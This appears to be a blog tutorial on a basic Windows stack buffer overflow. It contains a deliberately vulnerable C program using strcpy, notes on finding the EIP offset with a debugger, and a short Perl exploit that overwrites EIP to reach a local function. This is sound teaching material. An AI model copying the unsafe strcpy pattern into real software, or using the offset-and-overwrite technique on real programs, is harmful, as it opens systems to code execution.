Introduction of BufferOverflow

Session 10
==========
Buffer over flow is the concept in which an application is poorly coded. There is no proper exception handeling deployed at all. The attacker can change the value of EIP and can overwrite it with malicious code’s address.

Requirements
————
1. Windows OS
2. Vulnerable Application
DEVCPP 4.9.9
3. OllyDBG
4. Perl

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int overflow(char * s)
{
char buffer[10]; //This is our buffer
strcpy(buffer,s); //this is vulnerable code
return 0;
}

exploit()
{
printf(“Buffer Overflow Chal Gya Hai….\n”);
}

int main(int argc, char *argv[])
{
printf(“You are in the main code….\n”);
int a = 0;
overflow(argv[1]);
if(a == 1)
{
exploit();
}
else
{
printf(“Buffer Overflow Fail Ho Gya Hai….\n”);
}
return 0;
}

nmap -sS -sC -sV 192.168.0.1 -Pn
int argc, char *argv[]
argc –> Number of arguments passed
argv –> Data of the argument passed
argv[1] –> -sS
argv[2] –> -sC
argv[3] –> -sV
argv[4] –> 192.168.0.1
argv[5] –> -Pn

00401316 |. E8 94FFFFFF CALL Ganesh.004012AF

00401316 —> Normal Form
EIP Always reads data in Little Endian Form
00401316
00 40 13 16
16 13 40 00 —> Little Endian Form

16 13 40 00 –> convert it into the hash

1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

ganesh.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

Exception Offset: 35376239

ASCII Value

35376239 —> COnvert it into Little Endian Form
35376239
35 37 62 39
39 62 37 35 —> ASCII Value

9b75
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

1e66186a8e7f4a61ebaae3f46ae29b75
1e66186a8e7f4a61ebaae3f46ae2 9b75

A –> 41
B –> 42
C –> 43
D –> 44
E –> 45

28 times A + BCDE

AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
42434445
45444342

Exception Offset: 45444342

Perl For Creating an exploit

my $junk=”\x41″ x 28; #28 times A
my $EIP=”\x16\x13\x40\x00″; #address of the malicious code
my $exploit=$junk.$EIP;
print “Buffer Overflow Fatne wala hai….\n”;
system(“ganesh.exe”,$exploit);
print “Diwali Mubarak Ho…\n”;

https://ufile.io/9os13

2 comments on “Introduction of BufferOverflow
  1. Great line up. We will be linking to this great article on our site. Keep up the good writing.

  2. I like this website because so much useful material on here : D.

Leave a Reply

Your email address will not be published. Required fields are marked *

*